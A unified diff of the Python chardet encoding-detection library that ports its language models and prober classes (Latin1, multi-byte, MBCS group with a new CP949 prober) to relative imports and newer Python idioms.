255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -86,7 +84,7 @@ latin5_CharToOrderMap = ( \
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = ( \
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -105,7 +103,7 @@ macCyrillic_CharToOrderMap = ( \
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = ( \
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -124,7 +122,7 @@ IBM855_CharToOrderMap = ( \
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = ( \
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -143,13 +141,13 @@ IBM866_CharToOrderMap = ( \
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = ( \
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
@ -280,50 +278,52 @@ RussianLangModel = ( \
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = { \
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = { \
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = { \
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = { \
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
};
Ibm866Model = { \
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = { \
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa

View File

@ -13,27 +13,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
Latin7_CharToOrderMap = ( \
Latin7_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -52,7 +50,7 @@ Latin7_CharToOrderMap = ( \
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
win1253_CharToOrderMap = ( \
win1253_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -71,13 +69,13 @@ win1253_CharToOrderMap = ( \
9, 8, 14, 7, 2, 12, 28, 23, 42, 24, 64, 75, 19, 26, 27,253, # f0
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.2851%
# first 1024 sequences:1.7001%
# rest sequences: 0.0359%
# negative sequences: 0.0148%
GreekLangModel = ( \
# negative sequences: 0.0148%
GreekLangModel = (
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,3,2,2,3,3,3,3,3,3,3,3,1,3,3,3,0,2,2,3,3,0,3,0,3,2,0,3,3,3,0,
@ -208,18 +206,20 @@ GreekLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
Latin7GreekModel = { \
Latin7GreekModel = {
'charToOrderMap': Latin7_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-7"
}
Win1253GreekModel = { \
Win1253GreekModel = {
'charToOrderMap': win1253_CharToOrderMap,
'precedenceMatrix': GreekLangModel,
'mTypicalPositiveRatio': 0.982851,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1253"
}
# flake8: noqa

View File

@ -15,20 +15,18 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
@ -36,7 +34,7 @@ import constants
# Windows-1255 language model
# Character Mapping Table:
win1255_CharToOrderMap = ( \
win1255_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -55,13 +53,13 @@ win1255_CharToOrderMap = ( \
12, 19, 13, 26, 18, 27, 21, 17, 7, 10, 5,251,252,128, 96,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 98.4004%
# first 1024 sequences: 1.5981%
# rest sequences: 0.087%
# negative sequences: 0.0015%
HebrewLangModel = ( \
# negative sequences: 0.0015%
HebrewLangModel = (
0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,3,2,1,2,0,1,0,0,
3,0,3,1,0,0,1,3,2,0,1,1,2,0,2,2,2,1,1,1,1,2,1,1,1,2,0,0,2,2,0,1,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,
@ -192,10 +190,12 @@ HebrewLangModel = ( \
0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0,
)
Win1255HebrewModel = { \
Win1255HebrewModel = {
'charToOrderMap': win1255_CharToOrderMap,
'precedenceMatrix': HebrewLangModel,
'mTypicalPositiveRatio': 0.984004,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "windows-1255"
}
# flake8: noqa

View File

@ -13,27 +13,25 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# Character Mapping Table:
Latin2_HungarianCharToOrderMap = ( \
Latin2_HungarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -52,7 +50,7 @@ Latin2_HungarianCharToOrderMap = ( \
245,246,247, 25, 73, 42, 24,248,249,250, 31, 56, 29,251,252,253,
)
win1250HungarianCharToOrderMap = ( \
win1250HungarianCharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -71,13 +69,13 @@ win1250HungarianCharToOrderMap = ( \
245,246,247, 25, 74, 42, 24,248,249,250, 31, 56, 29,251,252,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 94.7368%
# first 1024 sequences:5.2623%
# rest sequences: 0.8894%
# negative sequences: 0.0009%
HungarianLangModel = ( \
# negative sequences: 0.0009%
HungarianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,
3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,2,3,3,1,1,2,2,2,2,2,1,2,
3,2,2,3,3,3,3,3,2,3,3,3,3,3,3,1,2,3,3,3,3,2,3,3,1,1,3,3,0,1,1,1,
@ -208,18 +206,20 @@ HungarianLangModel = ( \
0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,
)
Latin2HungarianModel = { \
Latin2HungarianModel = {
'charToOrderMap': Latin2_HungarianCharToOrderMap,
'precedenceMatrix': HungarianLangModel,
'mTypicalPositiveRatio': 0.947368,
'keepEnglishLetter': constants.True,
'keepEnglishLetter': True,
'charsetName': "ISO-8859-2"
}
Win1250HungarianModel = { \
Win1250HungarianModel = {
'charToOrderMap': win1250HungarianCharToOrderMap,
'precedenceMatrix': HungarianLangModel,
'mTypicalPositiveRatio': 0.947368,
'keepEnglishLetter': constants.True,
'keepEnglishLetter': True,
'charsetName': "windows-1250"
}
# flake8: noqa

View File

@ -13,29 +13,27 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# The following result for thai was collected from a limited sample (1M).
# The following result for thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = ( \
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
@ -54,13 +52,13 @@ TIS620CharToOrderMap = ( \
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
# Model Table:
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences:7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = ( \
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
@ -191,10 +189,12 @@ ThaiLangModel = ( \
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
)
TIS620ThaiModel = { \
TIS620ThaiModel = {
'charToOrderMap': TIS620CharToOrderMap,
'precedenceMatrix': ThaiLangModel,
'mTypicalPositiveRatio': 0.926386,
'keepEnglishLetter': constants.False,
'keepEnglishLetter': False,
'charsetName': "TIS-620"
}
# flake8: noqa

View File

@ -14,85 +14,86 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetprober import CharSetProber
import constants
import operator
from .charsetprober import CharSetProber
from .constants import eNotMe
from .compat import wrap_ord
FREQ_CAT_NUM = 4
UDF = 0 # undefined
OTH = 1 # other
ASC = 2 # ascii capital letter
ASS = 3 # ascii small letter
ACV = 4 # accent capital vowel
ACO = 5 # accent capital other
ASV = 6 # accent small vowel
ASO = 7 # accent small other
CLASS_NUM = 8 # total classes
UDF = 0 # undefined
OTH = 1 # other
ASC = 2 # ascii capital letter
ASS = 3 # ascii small letter
ACV = 4 # accent capital vowel
ACO = 5 # accent capital other
ASV = 6 # accent small vowel
ASO = 7 # accent small other
CLASS_NUM = 8 # total classes
Latin1_CharToClass = ( \
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F
OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57
ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F
OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77
ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F
OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87
OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F
UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97
OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF
ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7
ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF
ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7
ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF
ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7
ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF
ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7
ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF
Latin1_CharToClass = (
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F
OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F
ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57
ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F
OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F
ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77
ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F
OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87
OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F
UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97
OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7
OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF
ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7
ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF
ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7
ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF
ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7
ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF
ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7
ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF
)
# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 0 : illegal
# 1 : very unlikely
# 2 : normal
# 3 : very likely
Latin1ClassModel = ( \
# UDF OTH ASC ASS ACV ACO ASV ASO
0, 0, 0, 0, 0, 0, 0, 0, # UDF
0, 3, 3, 3, 3, 3, 3, 3, # OTH
0, 3, 3, 3, 3, 3, 3, 3, # ASC
0, 3, 3, 3, 1, 1, 3, 3, # ASS
0, 3, 3, 3, 1, 2, 1, 2, # ACV
0, 3, 3, 3, 3, 3, 3, 3, # ACO
0, 3, 1, 3, 1, 1, 1, 3, # ASV
0, 3, 1, 3, 1, 1, 3, 3, # ASO
Latin1ClassModel = (
# UDF OTH ASC ASS ACV ACO ASV ASO
0, 0, 0, 0, 0, 0, 0, 0, # UDF
0, 3, 3, 3, 3, 3, 3, 3, # OTH
0, 3, 3, 3, 3, 3, 3, 3, # ASC
0, 3, 3, 3, 1, 1, 3, 3, # ASS
0, 3, 3, 3, 1, 2, 1, 2, # ACV
0, 3, 3, 3, 3, 3, 3, 3, # ACO
0, 3, 1, 3, 1, 1, 1, 3, # ASV
0, 3, 1, 3, 1, 1, 3, 3, # ASO
)
class Latin1Prober(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
@ -109,10 +110,11 @@ class Latin1Prober(CharSetProber):
def feed(self, aBuf):
aBuf = self.filter_with_english_letters(aBuf)
for c in aBuf:
charClass = Latin1_CharToClass[ord(c)]
freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + charClass]
charClass = Latin1_CharToClass[wrap_ord(c)]
freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM)
+ charClass]
if freq == 0:
self._mState = constants.eNotMe
self._mState = eNotMe
break
self._mFreqCounter[freq] += 1
self._mLastCharClass = charClass
@ -120,17 +122,18 @@ class Latin1Prober(CharSetProber):
return self.get_state()
def get_confidence(self):
if self.get_state() == constants.eNotMe:
if self.get_state() == eNotMe:
return 0.01
total = reduce(operator.add, self._mFreqCounter)
total = sum(self._mFreqCounter)
if total < 0.01:
confidence = 0.0
else:
confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total)
confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0)
/ total)
if confidence < 0.0:
confidence = 0.0
# lower the confidence of latin1 so that other more accurate detector
# can take priority.
confidence = confidence * 0.5
# lower the confidence of latin1 so that other more accurate
# detector can take priority.
confidence = confidence * 0.73
return confidence
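
The reflowed get_confidence() keeps the same scoring idea: class-3 ("very likely") transitions raise the score, class-1 ("very unlikely") transitions are penalised twenty-fold, and the result is damped (now by 0.73 rather than 0.5) so that more specific probers still win close calls. A purely illustrative calculation with made-up counters:

    # Hypothetical frequency counters after feeding some Latin-1-looking text;
    # index 0 = illegal, 1 = very unlikely, 2 = normal, 3 = very likely.
    freq_counter = [0, 2, 50, 148]
    total = sum(freq_counter)                                # 200
    confidence = (freq_counter[3] - freq_counter[1] * 20.0) / total
    confidence = max(confidence, 0.0) * 0.73                 # (148 - 40) / 200 * 0.73 = 0.3942
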

View File

@ -15,28 +15,29 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from constants import eStart, eError, eItsMe
from charsetprober import CharSetProber
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = ['\x00', '\x00']
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
@ -44,7 +45,7 @@ class MultiByteCharSetProber(CharSetProber):
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = ['\x00', '\x00']
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
@ -53,27 +54,30 @@ class MultiByteCharSetProber(CharSetProber):
aLen = len(aBuf)
for i in xrange(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == eError:
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n')
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == eItsMe:
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == eStart:
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if self._mDistributionAnalyzer.got_enough_data() and \
(self.get_confidence() > constants.SHORTCUT_THRESHOLD):
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
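
This feed() loop is the shared engine for every multi-byte prober: eError retires the prober, eItsMe confirms it outright, and each return to eStart marks a complete character whose bytes are handed to the distribution analyzer for frequency scoring. A hypothetical smoke test with one of the concrete subclasses; the module path is an assumption about the vendored layout:

    from chardet.big5prober import Big5Prober

    prober = Big5Prober()
    prober.feed(b"\xa4\xa4\xa4\xe5")    # U+4E2D U+6587 ("Chinese") encoded as Big5
    print("%s %.2f" % (prober.get_charset_name(), prober.get_confidence()))
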

View File

@ -15,36 +15,40 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from charsetgroupprober import CharSetGroupProber
from utf8prober import UTF8Prober
from sjisprober import SJISProber
from eucjpprober import EUCJPProber
from gb2312prober import GB2312Prober
from euckrprober import EUCKRProber
from big5prober import Big5Prober
from euctwprober import EUCTWProber
from .charsetgroupprober import CharSetGroupProber
from .utf8prober import UTF8Prober
from .sjisprober import SJISProber
from .eucjpprober import EUCJPProber
from .gb2312prober import GB2312Prober
from .euckrprober import EUCKRProber
from .cp949prober import CP949Prober
from .big5prober import Big5Prober
from .euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber):
def __init__(self):
CharSetGroupProber.__init__(self)
self._mProbers = [ \
self._mProbers = [
UTF8Prober(),
SJISProber(),
EUCJPProber(),
GB2312Prober(),
EUCKRProber(),
CP949Prober(),
Big5Prober(),
EUCTWProber()]
EUCTWProber()
]
self.reset()
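
MBCSGroupProber simply fans input out to all of its member probers and reports the best-scoring one; the change here registers the new CP949Prober next to the existing East Asian probers. A hypothetical check, assuming the group prober keeps the usual get_charset_name()/get_confidence() accessors and the vendored module path shown:

    from chardet.mbcsgroupprober import MBCSGroupProber

    group = MBCSGroupProber()
    # Korean sample text, kept as unicode escapes for Python 2 source safety.
    group.feed(u"\ud55c\uad6d\uc5b4 \ud14d\uc2a4\ud2b8".encode("cp949"))
    print("%s %.2f" % (group.get_charset_name(), group.get_confidence()))
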

View File

@ -13,60 +13,62 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart, eError, eItsMe
# BIG5
# BIG5
